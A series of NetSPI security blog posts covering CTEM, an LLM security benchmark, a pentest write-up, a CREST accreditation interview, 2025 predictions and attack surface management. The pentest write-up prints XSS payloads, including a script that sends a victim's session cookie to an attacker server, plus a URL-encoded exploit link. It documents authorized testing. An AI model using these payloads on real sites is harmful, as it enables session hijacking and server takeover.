At its core, CTEM serves as a broader exposure management process that proactively minimizes risks while optimizing how organizations address and resolve security gaps. By integrating process improvement with technical threat assessments, CTEM shifts organizations from reactive to proactive security operations.

5 Steps to Implement a CTEM Program

1. Scoping Process

Start by defining the scope of objectives and aligning them with your business priorities. During this process, you want to identify sensitive assets, evaluate potential impacts, and foster collaboration across your organization to establish a focused, business-aligned scope for managing threats.

2. Discovery Process

Consider using a combination of penetration tests and an attack surface management solution to gain visibility of all known and hidden assets. Penetration testing is an effective point-in-time test that provides a snapshot of how vulnerable your critical assets are, so you can prioritize what matters most in the next step of CTEM. Using an attack surface management solution will give you continuous visibility into all hidden and known assets and manage the attack surface. These insights help you establish a clear understanding of your threat landscape.

3. Prioritization Process

Not every risk can be remediated immediately, so focus your resources on those with the highest potential impact. Balance technical severity with business relevance to ensure that you’re addressing the most critical vulnerabilities first, particularly those most likely to be exploited.

4. Validation Process

Test and retest your vulnerabilities to verify if they can be exploited, and ensure that mitigation efforts are effective. This is where breach and attack simulation, red teaming exercises, and additional penetration tests can validate the efficacy of your security program and remediation efforts.

5. Mobilization Process

Remediate high-risk vulnerabilities, track progress, and develop ongoing strategic plans for threat management. Mobilization also requires communication and training across your organization to ensure adoption and incremental improvement in CTEM practices.

What Are the Benefits of Adopting CTEM?

Adopting CTEM provides multiple advantages for enterprises aiming to stay ahead of the evolving threat landscape and improve cyber resiliency.

Maximize Security Resources

By prioritizing vulnerabilities and addressing critical threats early, CTEM allows for more efficient allocation of security resources. According to Gartner, “By 2026, Gartner predicts that organizations prioritizing their security investments based on a CTEM program will realize a two-thirds reduction in breaches.” This shift to proactive security that prevents breaches will allow security teams to maximize their resources.

Stay Ahead of Bad Actors

Cyberthreats evolve at an alarming pace, and CTEM empowers security teams to adapt just as quickly. Continuous exposure assessment and remediation equips security teams to address vulnerabilities before bad actors exploit them, minimizing risks and response times.

Build Long-Term Cyber Resilience

Beyond addressing immediate threats, CTEM emphasizes continuous improvement in both processes and governance. This holistic approach doesn’t just repair security gaps — it helps prevent similar vulnerabilities from emerging again. Over time, this drives long-term risk reduction.

How Does NetSPI Align with a CTEM Program?

NetSPI takes a proactive approach to cybersecurity programs by embedding CTEM principles directly into The NetSPI Platform, enabling you to align your security efforts with the CTEM process: scoping, discovery, prioritization, validation, and mobilization. The Platform includes Attack Surface Management, Penetration Testing as a Service, and Breach and Attack Simulation solutions, which all work together to support your alignment with CTEM and achieve consistent threat exposure management outcomes.

Penetration Testing as a Service (PTaaS)

NetSPI PTaaS delivers a robust pentesting program that includes more than 50 types of pentests that uncover vulnerabilities, exposures, and misconfigurations to help you through the initial processes of CTEM. The NetSPI Platform contextualizes outcomes in real-time, while our experts provide detailed guidance on prioritization and classification of risk. The Platform integrates with many common security tools, so you can accelerate your remediation and quickly close gaps. PTaaS provides additional support through the validation process by retesting to verify remediation effectiveness, and it addresses new threats as they arise. NetSPI PTaaS supports you through all processes of CTEM, so you can proactively reduce risk.

Attack Surface Management (ASM)

NetSPI ASM encompasses External Attack Surface Management (EASM) and Cyber Asset Attack Surface Management (CAASM) to deliver complete visibility into your attack surface, always-on coverage, and deep data context. This can significantly support scoping, discovery, and prioritization processes by identifying and inventorying visible and hidden assets and vulnerabilities, mapping attack paths, and providing deep contextual insights for streamlined remediation. With always-on monitoring and real-time asset and vulnerability updates, you can proactively inventory assets and tackle vulnerabilities as they arise in the evolving threat landscape.

Breach and Attack Simulation (BAS)

NetSPI BAS supports your CTEM program in the discovery, validation, and mobilization processes by testing your security controls to uncover vulnerabilities and misconfigurations against specific threat actors and malware techniques across your environment.  

Our security experts will work alongside you to provide deep context of your vulnerabilities and help prioritize risk. The Platform also helps prioritize, validate, and mobilize threats by providing step-by-step instructions to test, retest, and remediate threats, and by illustrating areas of high risk in a MITRE ATT&CK matrix. With BAS, you can optimize security controls, enhance detection, and track progress over time.

Ready to Bolster Your Proactive Security Journey?

The evolving threat landscape requires a proactive and adaptive approach. Aligning your security operations and processes with CTEM ensures you’re not just reacting to threats, but actively staying ahead of them. Let us help you accelerate your proactive security journey with The NetSPI Platform and our security experts by your side.

Balancing Security and Usability of Large Language Models: An LLM Benchmarking Framework https://www.netspi.com/blog/executive-blog/ai-ml-pentesting/balancing-security-and-usability-of-large-language-models-benchmarking-framework/ Mon, 16 Dec 2024 13:45:00 +0000 https://www.netspi.com/?p=26157 Explore the integration of Large Language Models (LLMs) in critical systems and the balance between security and usability with a new LLM benchmarking framework.

By 2026, Gartner predicts that “80% of all enterprises will have used or deployed generative AI applications.” However, many of these organizations have yet to find a way to balance usability and security in their deployments. As a result, consumer-facing LLM capabilities introduce a new and less understood set of risks for organizations. The mission of this article, along with the first release of the NetSPI Open Large Language Model (LLM) Security Benchmark, is to clarify some of the ambiguity around LLM security and highlight the visible trade-offs between security and usability.

TLDR;

  • Large Language Models (LLMs) have become more integrated into critical systems, applications, and processes, increasing the potential for security risks. 
  • Increasing security measures in LLMs can negatively affect usability, requiring the right balance; however, more restrictive behavior may be desired depending on the business use case. 
  • Our LLM benchmarking framework shows how different LLMs handle adversarial conditions, testing their jailbreakability, while measuring any impact on usability. 

Security Concerns in Large Language Models

As LLMs become integral to critical systems, the risk of vulnerabilities like model extraction, data leakage, membership inference, direct prompt injection, and jailbreakability increases. Jailbreaking refers to manipulating a model to bypass safety filters, potentially generating harmful content, exposing sensitive data, or performing unauthorized actions.

These vulnerabilities have significant implications. In business, a compromised LLM could leak proprietary information or become an attack vector. In public applications, there is a risk of harmful or biased content causing reputational damage and legal issues. Therefore, ensuring LLM security is crucial, highlighting the need for robust benchmarks to test their resilience against attacks, including jailbreakability.

Balancing Security and Usability

While enhancing the security of an LLM is important, usability is equally important. The model should still perform its intended functions effectively. Oftentimes, security and usability are a balancing act. This challenge is well-documented in software and system design – overly strict filters may limit useful responses, while insufficient security poses risks.

LLM Benchmarking Framework 

These challenges and concerns are not going away anytime soon. So, what can be done? We’ve created a benchmarking framework that evaluates both the security and usability of LLMs. Our systematic assessment shows how different LLMs handle adversarial conditions, testing their jailbreakability, while measuring any impact on usability. This dual evaluation helps balance security with functionality, crucial for AI applications in cybersecurity. 

Our intent is that the benchmark can provide some level of transparency so that it can be used by organizations to make more informed choices that better align to their use cases and risk appetite.

While the findings and benchmarks presented in this paper reflect our current understanding of LLM security and usability, it is important to note that this research is part of an evolving body of work. As advancements in model evaluation techniques and security practices emerge, we expect to refine and expand upon these benchmarks. We encourage feedback and constructive critique from readers, as it will help to further improve the robustness and comprehensiveness of our methodology. We remain committed to ensuring that these evaluations continue to meet the highest standards as the field develops.

We invite you to participate in this research and contribute your insights to the paper, helping shape the future of AI security.

From Informational to Critical: Chaining & Elevating Web Vulnerabilities https://www.netspi.com/blog/technical-blog/web-application-pentesting/uncovering-a-critical-vulnerability-through-chained-findings/ Tue, 10 Dec 2024 22:00:00 +0000 https://www.netspi.com/?p=26128 Learn about administrative access and Remote Code Execution (RCE) exploitation from a recent Web Application Pentest.

As a Security Consultant II at NetSPI, I’ve had the opportunity to dig into a variety of security issues during engagements, ranging from simple misconfigurations to complex attack chains. One recent project gave me the opportunity to uncover a critical vulnerability by chaining multiple findings together. This turned an initially informational issue into a high-severity, exploitative scenario. This blog will detail the steps I took, the vulnerabilities I found, and show how a seemingly benign misconfiguration led to full administrative access and exploitation of remote code execution (RCE). 

Read more from the author: CVE-2024-37888 – CKEditor 4 Open Link Plugin XSS

Setting the Scene: The Applications and Their Vulnerabilities

During the engagement, we had multiple applications in scope. All the applications were running on the same hostname, but on different ports. For simplicity, I’ll be referring to three of them as applications A, B, and C: 

Host: example.com 

  • Application A: example.com:1111 
  • Application B: example.com:2222 
  • Application C: example.com:3333 

All of the applications used the Authorization Header for authentication. 

Note that Application B has been mentioned below as a reference to show its similarity with Application C and does not directly take part in the exploit chain. 

Here’s a brief overview of the application configurations and vulnerabilities: 

  1. Application A: Vulnerable to Reflected Cross-Site Scripting (XSS) that could not be exploited for session hijacking due to HttpOnly flags on cookies and lack of session-based authentication. 
  2. Application B: Vulnerable to File Upload Remote Code Execution (RCE), rated as High Severity, but required an Admin account for exploitation. Additionally, there were sensitive Spring Boot actuator endpoints exposed, which also required admin privileges for exploitation. 
  3. Application C: Similar to Application B in terms of the RCE vulnerability and sensitive Spring Boot actuator exposure. The only interesting fact here was that the application also supported session-based authentication in addition to authorization header-based authentication. 

What made this scenario interesting was the Weak Configuration – Cross-Application Cookie Exposure on Different Ports vulnerability, a newly identified finding that I had just added to my testing methodology. All three applications were running on the same host (example.com), but on different ports, and they shared the same domain. While this might seem harmless at first, it created a security gap.

The issue stemmed from the fact that all applications were sharing the same cookie storage on the client side. This led to an Informational Severity finding, due to the way cookies were scoped to the parent domain (i.e., example.com). While each application had its own port, they were all vulnerable to Cross-Application Cookie Exposure, a scenario where cookies could be leaked between the different applications running on the same domain. 

Although important, this finding did not initially have a major impact, because none of the applications depended on session-based authentication. However, that changed when I noticed something unusual in Application C.

A Lightbulb Moment: Session-Based Authentication in Application C 

Unlike Applications A and B, Application C supported both Authorization Header-based authentication (like the other two applications) and Session-based authentication. During the login process, the client sends a request to Application C’s /rest/v1/authenticate endpoint with the Authorization header, and in response, the server issues a valid JSESSIONID session cookie which can be used for authentication in subsequent requests.

HTTP Request:

POST /rest/v1/authenticate HTTP/1.1 
Host: example.com:3333 
Authorization: Basic [REDACTED] 

HTTP Response:

HTTP/1.1 200  
Set-Cookie: JSESSIONID=B7223B56E59AEED6E0FF8A8880C05447; Path=/; Secure

The interesting part? The JSESSIONID cookie lacks the HttpOnly flag, which was a major red flag, especially when compared to the cookies issued by Applications A and B, both of which had the HttpOnly flag set. 

This discovery was pivotal. I could now attempt to hijack Application C’s session using the XSS vulnerability in Application A. However, there were several hurdles to overcome. 

The first challenge was that Application A also issued a session cookie with the same name (JSESSIONID), which would overwrite the session cookie from Application C in the client’s cookie storage. Application A’s JSESSIONID contained the HttpOnly flag, and since this flag prevented JavaScript access to the cookie, the XSS payload in Application A could not directly access the JSESSIONID. 

Luckily, there was a workaround. Application C made periodic AJAX requests to /rest/v1/authenticate every 2-3 seconds to keep the session alive. If an invalid JSESSIONID was included in these requests, Application C would re-authenticate and issue a new session cookie. This behavior allowed me to force Application C to overwrite the JSESSIONID cookie after it was initially replaced by the one from Application A.

The next challenge was to figure out how to access the cookie. Initially, the XSS payloads did not give me access to the cookie and instead triggered an alert showing undefined. 

The issue was that when I visited Application A with my payload, the JSESSIONID cookie from Application C was rejected by the server, and a new cookie (with the HttpOnly flag) was issued by Application A. 

However, after 2-3 seconds, when Application C issued its new session cookie, the cookie storage was updated, and I was able to access Application C’s session cookie, the one without the HttpOnly flag, from the browser console using document.cookie (though not yet through the payload itself). 

I attempted various delay methods to give the session cookie of Application C time to load, such as: 

<script>window.onload=alert(document.cookie)</script> 

<script>document.onload=alert(document.cookie)</script> 

<script>document.addEventListener("DOMContentLoaded", (event) => {alert(document.cookie)});</script>

Nothing worked. I was about to give up when I noticed something crucial—the overwriting of the JSESSIONID cookie from Application C didn’t happen instantaneously. It took a few seconds for the cookie to be updated. So, I decided to add a 5-second delay before executing my payload: 

<script>setTimeout(() => { alert(document.cookie) }, 5000)</script>

This worked perfectly! I was able to access the JSESSIONID cookie issued by Application C, and I quickly crafted a stealthy payload to steal it: 

<script>setTimeout(()=>{fetch('https://my-malicious-server.com?cookie='+document.cookie).then()},5000)</script> 

I encoded the URL to bypass any server restrictions and crafted the final exploit URL: 

https://example.com:1111?id=<script>setTimeout%28%28%29%3d>%7bfetch%28%27https%3a%2f%2fmy-malicious-server.com%3fcookie%3d%27%2bdocument%2ecookie%29%2ethen%28%29%7d%2c5000%29<%2fscript> 

Once the victim clicked the link, the cookie value was exfiltrated to my server.

Escalating the Impact 

At this point, I had successfully hijacked the session cookie for Application C and had admin access. Application C was also vulnerable to an RCE and had sensitive Spring Boot actuators exposed. Using the stolen session cookie, I was able to exploit these vulnerabilities and gain full access to the backend server hosting all the applications. 

Bumping Up the Severity 

Initially, the Weak Configuration – Cross-Application Cookie Exposure finding had been rated as Informational due to its lack of immediate impact. However, by chaining it with other vulnerabilities, such as the XSS and the absence of the HttpOnly flag on Application C’s session cookie, I was able to escalate the finding to Critical severity. 

This chain of attacks allowed me to exploit the Remote Code Execution (RCE) vulnerability without needing Admin credentials of my own, by hijacking an administrator’s session. This turned an otherwise harmless misconfiguration into a full-fledged critical risk. 

Full Attack Chain

Conclusion 

This engagement was a perfect example of how multiple vulnerabilities in seemingly unrelated applications can be chained together to create a critical security risk. What started as an informational finding became a full-blown exploit chain, ultimately leading to administrative access on Application C and exploitation of Remote Code Execution.

The lesson? Never underestimate the potential impact of a simple misconfiguration. Even seemingly minor issues can lead to devastating consequences when combined with other vulnerabilities. 

Q&A with Jonathan Armstrong: An Inside Look at CREST Accreditation https://www.netspi.com/blog/executive-blog/compliance/an-inside-look-at-crest-accreditation/ Thu, 05 Dec 2024 10:56:19 +0000 https://www.netspi.com/?p=26115 Explore the role of CREST accreditation in cybersecurity, its link to DORA, and insights from Jonathan Armstrong on its future in the security industry.

Accreditations play a vital role in enabling cybersecurity providers to demonstrate their organisational capabilities and expertise. One prominent example is the CBEST Accreditation. Achieving CBEST-approved status and utilizing testers with CREST certifications signifies that an organisation and its security practitioners have evidenced the highest level of skills and capabilities required to deliver specialized testing services in the financial sector.  

CREST has recently gained significant attention due to its alignment with the Digital Operational Resilience Act (DORA). This legislation aims to enhance the operational resilience of financial entities operating within the European Union (EU). Set to take effect on 17 January 2025, DORA mandates rigorous testing protocols carried out by highly qualified and experienced professionals, including those certified by CREST. 

To dive deeper into the importance of CREST, we spoke with Jonathan Armstrong, Head of Accreditation at CREST. He shares insights into why companies seek accreditation, the skills required to achieve this, and what the future holds for accreditation in the security industry.

The responses below are direct quotes from Jonathan Armstrong.

The Value of Earning CREST Accreditation

1. As cyberattacks are on the increase, we’re seeing a corresponding increase in vendors wanting and needing the necessary accreditations to fulfil this demand from end customers. What does having CBEST accreditation mean?

CBEST accreditation provides the highest level of assurance for vendors offering cyber resilience services to the financial sector. It demonstrates that the organisation has not only a solid operational foundation, but also a proven history of delivering high-quality services. To achieve this accreditation, vendors must also employ professionals with the highest CREST certifications, ensuring that skilled experts operate within well-structured, well-governed environments. This combination of technical expertise and strong governance gives financial institutions confidence that these providers can handle the most sophisticated and critical security challenges.

2. What are some of the specific values that CREST brings? 

Since its inception in 2006, CREST has grown into a global leader in the cybersecurity community. By collaborating with our members and their technical experts, we have earned a reputation for setting and maintaining industry-recognised standards across a wide range of cybersecurity disciplines.

Our mission is at the heart of everything we do: we develop and measure the capabilities of the cybersecurity industry, work to expand the pipeline of skilled professionals, and set global standards to ensure consistently high-quality services. Through active engagement with the global cybersecurity community, we leverage shared knowledge and expertise for the benefit of the entire industry.

3. How difficult is it to attain CBEST accreditation? Walk us through the typical stages of the process.

Attaining CBEST accreditation is a challenging process that requires organisations to undergo multiple assessments, including several levels of validation and verification. Organisations must also demonstrate a proven track record of delivering services to the financial sector, ensuring they are well acquainted with the unique challenges in this space. In addition, employees must maintain their individual certifications, proving that they not only possess the necessary skills but are continually keeping them up to date.

4. How does CREST prioritise the importance of organisational accreditation compared to the qualifications of individual professionals within the organisation?

CREST recognises the crucial role that both organisational accreditation and individual certifications play in delivering high-quality cybersecurity services. For optimum assurance, both elements must be carefully considered and integrated.

While skilled professionals provide a strong level of technical assurance, they must operate within mature organisational structures that have well-defined processes and practices, ensuring transparency, consistency, and reliability. Organisational accreditation serves as the foundation upon which these individual skills can be fully leveraged and utilised. 

Additionally, while buyers are naturally concerned with the expertise of individual testers, it is equally important to ensure that the organisation has the commercial capability to support its services. This includes financial stability, robust technical controls, and appropriate commercial insurances to safeguard against any potential issues. 

All about Digital Operational Resilience Act (DORA)

5. Everyone seems to be talking about DORA. What are the top benefits this will bring to financial entities, and the wider security landscape, in 2025?

At the heart of the CREST mission is consistency, and that’s why I see the top benefit of DORA in 2025 as the introduction of a unified and consistent framework across the EU. This will allow financial institutions to demonstrate compliance across multiple member states, eliminating the need to navigate varying regulatory standards. 

The inclusion of third-party providers under this framework is equally important. It aligns with the broader understanding that, in order to be secure, we must defend as one. By bringing service providers into the fold, DORA strengthens the entire ecosystem, ensuring that resilience is built collaboratively across both financial institutions and their partners.

6. How can companies prepare for operational resilience testing, especially if they don’t have a regulatory body overseeing them currently?

A core part of CREST’s mission is collaboration, and this applies directly to preparing for operational resilience testing. Even if a company does not have a regulatory body overseeing them, they can proactively prepare by working with experienced external providers who hold industry-recognised certifications, such as those under the CBEST framework. These providers bring invaluable insights from real-world testing scenarios, ensuring that companies benefit from best practices that have already been tried and tested in highly regulated environments. 

Companies could start by conducting a thorough internal assessment of their current resilience capabilities, focusing on key areas like incident response, system recovery, and business continuity. Engaging with external experts early in this process can be valuable, helping companies identify gaps and strengthen their operational resilience before regulatory scrutiny.

7. How do you think accreditations, security frameworks, and regulatory bodies will shape cybersecurity over the next 12 months?

At CREST, we are uniquely positioned within the global cybersecurity landscape, engaging with national regulators, authorities, and key stakeholders worldwide. While each country faces distinct challenges based on their local market needs, the core cybersecurity threats remain similar across borders. From our perspective, there is an increasing focus on using accreditation as a driver for both capacity and capability growth within the industry. This reflects a broader trend towards formalising cybersecurity practices and ensuring quality assurance through standardised frameworks.

In response to these needs, we recently launched the CREST Cyber Accelerated Maturity Programme (CREST CAMP), a pivotal initiative initially funded by the UK Foreign, Commonwealth and Development Office (FCDO). CREST CAMP is designed to accelerate the maturity of cybersecurity service providers in regions that have identified a need to improve their local cybersecurity ecosystems. Through targeted mentoring, training, and guidance, CREST CAMP supports companies on their journey towards professionalisation and full accreditation.

CREST CAMP is designed to accelerate the maturity of cybersecurity service providers in regions that have identified a need to improve their local cybersecurity ecosystems.

This initiative marks a significant shift in how development funds are being directed, with a growing recognition of the private sector’s critical role in national security. Governments increasingly rely on private sector expertise to address resource shortfalls, while the broader economy depends on high-quality private sector cybersecurity providers to function securely. We expect accreditation to continue being a key mechanism in building resilience and trust within global cyber ecosystems, helping both public and private sectors bolster their security posture.

Conclusion

CBEST and CREST are crucial accreditations for cybersecurity providers, particularly in the financial sector, as they ensure the highest level of capability and operational assurance. With the upcoming DORA regulation taking effect in January, CREST’s role is becoming increasingly significant as a mechanism to identify high-quality, capable providers. Accreditations will play a key role in advancing cybersecurity practices, fostering resilience and trust throughout the global cyber ecosystem.

The post Q&A with Jonathan Armstrong: An Inside Look at CREST Accreditation appeared first on NetSPI.

]]>
2025 Cybersecurity Trends That Redefine Resilience, Innovation, and Trust https://www.netspi.com/blog/executive-blog/security-industry-trends/2025-cybersecurity-trends/ Tue, 03 Dec 2024 15:00:00 +0000 https://www.netspi.com/?p=26105 Explore how 2025’s biggest cybersecurity trends—AI-driven attacks, deepfakes, and platformization—are reshaping the security landscape.

The post 2025 Cybersecurity Trends That Redefine Resilience, Innovation, and Trust appeared first on NetSPI.

]]>
The cybersecurity landscape is always changing, and 2025 is a continuation of this evolution. With emerging threats like AI-driven attacks, deepfakes, and post-quantum cryptographic vulnerabilities, organizations face an increasingly complex and high-stakes digital environment.  

We see this rapidly changing threat landscape as an opportunity. An opportunity to rethink resilience, innovation, and accountability in cybersecurity. The coming year will demand that organizations prioritize proactive strategies, seamless collaboration, and smarter, more integrated solutions that can keep pace with modern risks. 

By anticipating the trends and innovations shaping the future, NetSPI’s 2025 cybersecurity predictions explore how the industry will redefine cybersecurity, empowering businesses to stay ahead in the fight for digital resilience. 

Hear from security experts across NetSPI, including:  

NetSPI’s 2025 Cybersecurity Predictions 

Aaron Shilts
CEO 

Consolidation and platformization gain momentum  

“In 2025, the platformization trend will continue to gain momentum as cybersecurity executives remain focused on the effectiveness of their technology stack and service providers. This will drive a greater shift towards fewer, more comprehensive solutions that reduce management complexity and enhance team productivity.  

With cyber threats growing more complex and frequent, CISOs are under immense pressure to ensure that their teams can respond rapidly and decisively. To address this, in the coming year, they will focus on quality over quantity, favoring vendors that deliver integrated, streamlined platforms over a multitude of point solutions that are expensive and resource-intensive to manage. Consolidation will enable cybersecurity teams to work within a unified ecosystem, simplifying data management, minimizing redundancies, and reducing vendor fatigue—which can lead to critical information being overlooked. As security teams seek to reduce noise and increase efficiency, platforms offering broader functionality without the bloat of fragmented solutions will stand out, ultimately empowering teams to concentrate on the highest-priority risks.” 

“Consolidation will enable cybersecurity teams to work within a unified ecosystem, simplifying data management, minimizing redundancies, and reducing vendor fatigue—which can lead to critical information being overlooked.”

The rise of real-time, comprehensive attack surface management (ASM) 

“In 2025, the demand for comprehensive ASM solutions will drive significant consolidation within cybersecurity platforms. Organizations are increasingly focused on gaining real-time, holistic visibility into their digital assets—whether external, internal, or cloud-hosted. For today’s security teams, the source of an asset is less critical than understanding its role and risk within the broader ecosystem. As a result, the cybersecurity market will shift toward unified platforms that provide clear, real-time visibility across the entire asset landscape, eliminating the need for fragmented, asset-specific solutions that can create data silos and impede response times.” 

Nabil Hannan
Field CISO

Landscape shift toward CISO accountability 

“I anticipate that in 2025, we will see a shift in the CISO accountability landscape and how these leaders are held responsible when data breaches and cyberattacks occur.  

First, security will be increasingly viewed as a business-wide responsibility in the coming year, with proper definitions of which departments are responsible for which aspect of security. For example, IT is responsible for the infrastructure, HR manages employee security awareness, and so forth.  

Second, the CISO role will become more collaborative and advisory to other departments, with the CISO sharing their security expertise to assess, prioritize, mitigate, and/or accept risk.  

“The CISO role will become more collaborative and advisory to other departments, with the CISO sharing their security expertise to assess, prioritize, mitigate, and/or accept risk.”

Finally, CISOs will increasingly have a seat at the table to ensure that security decisions are made in proper alignment with the relevant business goals, with a focus on proactive risk management.  

Security needs to be woven into the day-to-day operations of the business, instead of being the sole responsibility of the CISO. Building a culture of security across the organization will need to be a critical focus in 2025.”

Tom Parker
CTO

Downfall of present-day encryption 

“Over the next several years, attackers will increasingly leverage artificial intelligence (AI) and machine learning (ML) to both introduce new attack techniques and accelerate existing ones. As a result, cyber companies will seek to implement products to detect and respond to both conventional and AI-based threats, resulting in an arms race, where adversarial AI is pitted against defensive AI. Additionally, we will likely see the downfall of present-day encryption, used to protect much of the internet – namely SSL. Companies should prepare for this, by taking inventory of their SSL attack surface for critical applications, to evaluate compensating controls.” 

“Additionally, we will likely see the downfall of present-day encryption, used to protect much of the internet – namely SSL. Companies should prepare for this, by taking inventory of their SSL attack surface for critical applications, to evaluate compensating controls.”

Patrick Sayler
Director of Social Engineering

Vishing will gain popularity among threat actors 

“Vishing was on the rise throughout 2024, and this will continue into 2025 as deepfakes and voice cloning technology becomes more accessible. Phishing protections are becoming increasingly more robust – for example, mail filters are smarter about the content they let through, and identity providers have started to enforce stricter default controls. However, live, real-time interaction introduces several layers to an attack that simply aren’t present when a victim is reading text in an email. Hearing the emotion and intention behind a voice can disarm an individual, putting them on the spot and causing them to think less critically about the situation. Vishing detection tools will need to evolve to keep pace, adopting advanced techniques, like voice pattern recognition and behavioral analysis, to accurately identify and prevent these threats.” 

AI lowers the barrier of entry but results in less sophisticated attacks  

“Specific tactics and pretexts used by threat actors will largely remain the same throughout the next 12 months. Phishing toolkits will capture credentials and hijack user sessions, and phone calls to support teams will still result in an account compromise through a simple password reset. Instead, I predict that some attacks may devolve in 2025, driven by the commoditization of AI. The increased availability of AI tools has significantly lowered the barrier to entry and has given anyone the ability to become an effective social engineer. Entire emails can be generated by large language models from a single sentence prompt, and voices can be cloned from mere seconds of speech.  

“The increased availability of AI tools has significantly lowered the barrier to entry and has given anyone the ability to become an effective social engineer. Entire emails can be generated by large language models from a single sentence prompt, and voices can be cloned from mere seconds of speech.”

As a result, this could lead to a trend of less sophisticated attacks executed by groups that may not be trained – or even interested in – establishing long-term persistence in an internal environment. These threat groups would be driven by the immediate wins they see by “dumpster diving” and exposing customer data, internal communications, and company secrets. So while the attacks may be easier to detect and investigate from an incident response perspective, the reputational hit from such a breach could ultimately be more damaging in the long run.” 

Kurtis Shelton
Principal AI Researcher – AI/ML Penetration Testing (AML) Service Lead 

Agentic AI will continue to redefine security strategies  

“In the coming year, agentic AI is poised to significantly transform security strategies by enhancing both proactive and reactive measures. Autonomous agents will likely be used to monitor networks for threats, identify vulnerabilities before exploitation, and respond to incidents in real-time with minimal human intervention. They may dynamically adjust security rules based on evolving threat patterns or autonomously quarantine compromised systems, greatly reducing response times. 

“However, the rise of these autonomous agents will also introduce new risks, as they themselves can become targets for attacks.”

However, the rise of these autonomous agents will also introduce new risks, as they themselves can become targets for attacks. If compromised, they could inflict considerable damage to an organization due to their limited oversight. Future security strategies will need to focus on robust defenses against adversarial AI, emphasizing the importance of explainability, continuous monitoring of decision-making processes, and adherence to strong security principles to ensure that these systems remain secure and trustworthy in a rapidly evolving threat landscape.” 

AI will become an active decision-maker, shaping the future of accountability and misinformation control 

“Looking toward 2025, AI systems are set to gain greater autonomy in decision-making, driven by advancements in reinforcement learning and multi-agent systems. As AI evolves from passive tools to active decision-makers, transparent accountability frameworks will become essential, particularly in fields like cybersecurity, supply chain management, and customer service. 

At the same time, AI’s role in addressing misinformation will become even more critical. As synthetic media and deepfakes grow increasingly sophisticated, AI will be indispensable not only for generating but also for detecting misinformation. By 2025, we can expect a surge in AI-driven tools for verifying content authenticity, bringing greater focus to media literacy. With AI’s widening societal impact, regulatory bodies will require strict adherence to standards for fairness, bias reduction, and reliability, challenging organizations to balance innovation within these evolving frameworks.” 

Maril Vernon
Solutions Architect 

Collaborative threat simulation 

“Right now, the security industry doesn’t benefit from what law enforcement figured out a long time ago: information sharing catches bad guys.”

“Right now, the security industry doesn’t benefit from what law enforcement figured out a long time ago: information sharing catches bad guys. In 2025, I anticipate the security industry will see more collaborative simulations, where multiple organizations share anonymized attack data to improve collective defenses. This will be a key component in preventing supply chain attacks. However, prevention is only one pillar of resilience – organizations still need to identify, respond, and adapt. It’s believed that it’s shameful and taboo to experience a breach, but sharing with the community how it happened, what evaded detections, how effective–or ineffective–the response was, and what was done to adapt to future attacks will help everyone with the “adapt” piece of resilience.” 

Evolution of threat modeling 

“In 2025, threat modeling will have to expand and adapt to account for new areas like post-quantum cryptography and AI-specific vulnerabilities. Given the increased prevalence of AI, I anticipate a growing emphasis on API security and data strategies in threat modeling.  

“While there will be a stronger push toward automated threat modeling tools over the course of the next year, it’s important to recognize that threat modeling is fundamentally a collaborative, human exercise.”

While there will be a stronger push toward automated threat modeling tools over the course of the next year, it’s important to recognize that threat modeling is fundamentally a collaborative, human exercise. It involves thinking through complex attack paths, understanding nuanced business logic, and considering unique threats based on the organization’s specific architecture and environment—all of which require human reasoning. Automated tools may help reduce manual overhead next year, but I predict they will serve more as assistants rather than replacements for human-driven threat modeling.” 

Karl Fosaaen
Vice President of Research 

Continuous assessment in the cloud will enhance overall security posture 

“As we continue to embrace cloud solutions and remote work, the attack surface continues to expand. Remote work infrastructure introduces unique complexities that can be difficult to manage, so it must be properly designed, deployed, and secured to strike the balance between usability and security. By leveraging innovative technologies and continuous assessment, organizations can not only reduce their attack surface but also bolster their overall security posture in an increasingly challenging digital landscape. Looking ahead to 2025, I anticipate that we’ll see advancements in cloud security tools that could significantly enhance organizations’ ability to protect themselves from emerging threats. 

“Remote work infrastructure introduces unique complexities that can be difficult to manage, so it must be properly designed, deployed, and secured to strike the balance between usability and security.”

Further, while detection and alerting capabilities have improved, many organizations still lack critical indicators in their logs that should prompt actionable responses. This will be a key area for innovation in the upcoming year, as developments have already emerged in the cloud attack detection space to help organizations better recognize and respond to potential threats.” 

2025 will redefine the cybersecurity landscape, bringing both challenges and opportunities with it. From the rise of AI-driven threats and deepfakes to the increasing importance of integrated security solutions, organizations must adapt quickly to stay secure. Consolidating tools, fostering collaboration, and adopting real-time visibility into attack surfaces will be key to navigating this complex environment.  

By proactively addressing these trends and integrating strategies, organizations can not only defend against emerging threats, but also position themselves for long-term resilience. At NetSPI, we’re committed to empowering businesses with the tools and insights they need to thrive in this dynamic digital age.  

Discover how The NetSPI Platform can revolutionize your approach to security, offering advanced, proactive solutions to safeguard your organization. Take the first step toward redefining your security strategy for 2025 and beyond. 

The post 2025 Cybersecurity Trends That Redefine Resilience, Innovation, and Trust appeared first on NetSPI.

]]>
The Attack Surface is Changing – So Should Your Approach https://www.netspi.com/blog/executive-blog/attack-surface-management/the-attack-surface-is-changing-so-should-your-approach/ Tue, 26 Nov 2024 15:00:00 +0000 https://www.netspi.com/?p=26098 Discover the pitfalls of DIY attack surface management and why NetSPI's solutions offer superior security and efficiency.

The post The Attack Surface is Changing – So Should Your Approach appeared first on NetSPI.

]]>
The attack surface is rapidly changing, especially when it comes to external assets. New threats emerge daily and employees increasingly use new tools and services unknown to IT departments, increasing risk exposure. This has made security organizations more focused on finding ways to better manage their growing attack surface. Security teams employ numerous strategies to address this challenge. The first step is often a simple one: a spreadsheet. 

Is a Spreadsheet Enough for Attack Surface Visibility? 

A spreadsheet is the common first step in attempting to gain visibility of all external-facing assets. Essentially, security teams run a few asset discovery or vulnerability scans, build API integrations, pull all the assets found into a single spreadsheet, possibly add some sort of categorization or other information, and boom!  

My attack surface is now managed, right? 

Although this may work in the short-term for some smaller organizations, it quickly turns into a full-time job for individuals already stretched too thin.  

Which areas of our network need to be scanned? How often should we run scans? How do we deduplicate the information? How do I reduce false positives? Which vulnerabilities do I prioritize? And the list goes on.  

An accurate and updated inventory of your attack surface assets and vulnerabilities becomes even more complicated once your organization starts growing and adds even more network segments. 

Security professionals may believe this manual approach will provide an inventory of assets and improve the security of those assets for relatively low costs, when it is actually labor-intensive, time-consuming, and often incomplete. Discovering assets is one thing, but keeping up with the changes, associated risks, and potential exposures is another. Trying to figure out which data points to collect, building integrations, normalizing the data, validating and prioritizing findings, and then turning it into usable information is a difficult challenge that comes with large labor costs. 

